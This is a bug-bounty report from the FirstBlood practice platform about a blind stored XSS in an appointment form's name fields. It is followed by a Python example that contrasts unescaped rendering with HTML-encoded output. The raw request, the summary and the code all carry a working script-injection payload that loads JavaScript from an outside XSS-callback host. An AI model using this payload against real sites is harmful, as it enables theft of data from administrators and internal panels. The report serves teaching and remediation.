FirstBlood-#1729 — Blind XSS in appointments
This issue was discovered on FirstBlood v3
On 2022-12-14, pichik Level 4 reported:
Hello doctor Sean,
DESCRIPTION:
I found that appointment params are vulnerable to blind XSS and executed internally.
The vulnerable params are fname and lname.
There is no filtering nor encoding, so the payload is as simple as "><script+src=https://xsshunter.ht></script>.
It will trigger if the address in the appointment was not found and an attempt to call failed, but I can not tell if these are the only requirements.
Here is the request:
POST /api/ba.php HTTP/1.1
Host: 9f0fae8ab2d6-pichik.a.firstbloodhackers.com
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Content-Type: application/x-www-form-urlencoded
Anti-Csrf: 27138-7496-80253

&address=test&city=test&phonenumber=test&email=test&dob=test&a1=&a2=&a3=&message=&slot=&drId=1&ambulance=1&status=&fname="><script+src=https://xsshunter.ht></script>&lname="><script+src=https://xsshunter.ht></script>
POC SCREEN:
Here is a screenshot from the internal endpoint:
IMPACT:
An attacker can access internal information with this XSS.
REMEDIATION:
HTML encode all user input to prevent XSS.
P1 CRITICAL
Endpoint: /api/ba.php
Parameter: lname,fname
Payload: "><script+src=https://xsshunter.ht></script>
FirstBlood ID: 78
Vulnerability Type: Stored XSS
When booking an appointment with the ambulance value set to "1", the user's full name is vulnerable to stored XSS on the internal admin panel "firstblood-helper.com".
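Added example (not code from the report or from the FirstBlood application): it parses the form-urlencoded body quoted in the request above, then renders the stored first/last name into a hypothetical admin-panel row twice, once the way the defect behaves (values concatenated straight into markup) and once with the remediation the report recommends (HTML-encode every stored value at the point it is written into HTML). The row layout, the function names and the column set are assumptions; the body and payload are the ones on the page.

```python
import html
from urllib.parse import parse_qs

# Request body exactly as quoted in the report. In application/x-www-form-urlencoded
# data a '+' decodes to a space, so "<script+src=..." arrives as "<script src=...".
BODY = (
    "&address=test&city=test&phonenumber=test&email=test&dob=test&a1=&a2=&a3="
    "&message=&slot=&drId=1&ambulance=1&status="
    '&fname="><script+src=https://xsshunter.ht></script>'
    '&lname="><script+src=https://xsshunter.ht></script>'
)


def parse_appointment(body: str) -> dict:
    """Decode the form body into a flat dict, the way the booking endpoint would
    see it before storing the record. keep_blank_values keeps the empty fields."""
    fields = parse_qs(body, keep_blank_values=True)
    return {name: values[0] for name, values in fields.items()}


def _row(full_name: str, address: str, ambulance: str) -> str:
    """Assumed admin-panel row layout (hypothetical, not the real helper panel)."""
    return f"<tr><td>{full_name}</td><td>{address}</td><td>{ambulance}</td></tr>"


def render_admin_row_vulnerable(appt: dict) -> str:
    """Mirrors the reported defect: stored values are written into the internal
    panel's HTML without any encoding, so the stored <script> tag is rendered live."""
    full_name = appt["fname"] + " " + appt["lname"]
    ambulance = "yes" if appt.get("ambulance") == "1" else "no"
    return _row(full_name, appt["address"], ambulance)


def render_admin_row_fixed(appt: dict) -> str:
    """Remediation: HTML-encode each value as it is placed into markup.
    quote=True also encodes '"' and "'", so the same helper is safe whether the
    value lands in element text or inside a quoted attribute."""
    esc = lambda v: html.escape(str(v), quote=True)
    full_name = esc(appt["fname"]) + " " + esc(appt["lname"])
    ambulance = "yes" if appt.get("ambulance") == "1" else "no"
    return _row(full_name, esc(appt["address"]), ambulance)


def script_tag_survives(markup: str) -> bool:
    """Simple check for the test: did a raw <script tag make it into the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    appt = parse_appointment(BODY)
    print("stored fname:", appt["fname"])
    print("vulnerable:", render_admin_row_vulnerable(appt))
    print("fixed:     ", render_admin_row_fixed(appt))
```

Encoding belongs at the output side (when the value is written into HTML), not only at intake: the same stored name may later be placed into an attribute, a JavaScript string or a URL, and each of those contexts needs its own encoding.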